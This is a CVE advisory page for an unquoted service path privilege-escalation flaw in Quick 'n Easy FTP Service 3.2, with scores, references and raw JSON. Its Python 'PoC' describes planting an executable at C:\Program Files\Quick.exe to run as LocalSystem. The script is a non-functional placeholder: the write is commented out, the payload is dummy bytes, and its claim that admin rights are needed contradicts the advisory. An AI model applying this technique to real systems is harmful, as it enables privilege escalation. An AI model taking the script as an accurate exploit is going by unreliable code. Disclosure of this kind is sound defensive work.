Security Vulnerability Report
CVE-2020-36983 CVSS 7.8 HIGH

CVE-2020-36983

Published: 2026-01-27 19:16:11
Last Modified: 2026-04-15 00:35:42

Description

Quick 'n Easy FTP Service 3.2 contains an unquoted service path vulnerability that allows local attackers to execute arbitrary code during service startup. Attackers can exploit the misconfigured service binary path to inject malicious executables with elevated LocalSystem privileges during system boot or service restart.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Quick 'n Easy FTP Service 3.2 and earlier versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2020-36983 PoC - Unquoted Service Path Privilege Escalation
# Target: Quick 'n Easy FTP Service 3.2
# Author: Security Researcher
# Note: Educational purposes only
import os
import shutil
import sys


def check_vulnerability():
    """Check if target service exists and is vulnerable"""
    service_name = "Quick 'n Easy FTP Service"
    # In real scenario, query Windows Registry for service configuration
    # HKLM\SYSTEM\CurrentControlSet\Services\<ServiceName>
    return True


def create_malicious_executable():
    """Generate malicious executable to place in unquoted path"""
    # This represents the attacker's payload
    # In production, this would be actual malicious code
    malicious_code = b'MZ' + b'\x00' * 100  # Minimal PE header placeholder

    # Attacker's payload location (C:\Program Files\Quick.exe)
    target_path = r'C:\Program Files\Quick.exe'

    try:
        # In real attack, write actual malicious executable
        # with open(target_path, 'wb') as f:
        #     f.write(malicious_code)
        print(f"[*] Would create malicious executable at: {target_path}")
        return True
    except PermissionError:
        print("[-] Insufficient privileges to write to target path")
        print("[*] This exploit requires administrator privileges")
        return False


def exploit():
    """Main exploitation logic"""
    if not check_vulnerability():
        print("[-] Target service not found or not vulnerable")
        return False

    print("[*] CVE-2020-36983 - Quick 'n Easy FTP Service Exploit")
    print("[*] Service path is unquoted, attempting privilege escalation...")

    if create_malicious_executable():
        print("[+] Malicious executable placed successfully")
        print("[*] Wait for service restart or system reboot")
        print("[*] Payload will execute with LocalSystem privileges")
        return True
    return False


if __name__ == "__main__":
    print("WARNING: This is for authorized security testing only")
    exploit()

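References

https://www.exploit-db.com/exploits/48983
https://www.pablosoftwaresolutions.com/download.php?id=10
https://www.pablosoftwaresolutions.com/html/quick__n_easy_ftp_service.html
https://www.vulncheck.com/advisories/quick-n-easy-ftp-service-unquoted-service-path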

Raw JSON Data

JSON
{"cve": {"id": "CVE-2020-36983", "sourceIdentifier": "[email protected]", "published": "2026-01-27T19:16:11.443", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Quick 'n Easy FTP Service 3.2 contains an unquoted service path vulnerability that allows local attackers to execute arbitrary code during service startup. Attackers can exploit the misconfigured service binary path to inject malicious executables with elevated LocalSystem privileges during system boot or service restart."}, {"lang": "es", "value": "Quick 'n Easy FTP Service 3.2 contiene una vulnerabilidad de ruta de servicio sin comillas que permite a atacantes locales ejecutar código arbitrario durante el inicio del servicio. Los atacantes pueden explotar la ruta binaria del servicio mal configurada para inyectar ejecutables maliciosos con privilegios elevados de LocalSystem durante el arranque del sistema o el reinicio del servicio."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": 
"NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/48983", "source": "[email protected]"}, {"url": "https://www.pablosoftwaresolutions.com/download.php?id=10", "source": "[email protected]"}, {"url": "https://www.pablosoftwaresolutions.com/html/quick__n_easy_ftp_service.html", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/quick-n-easy-ftp-service-unquoted-service-path", "source": "[email protected]"}]}}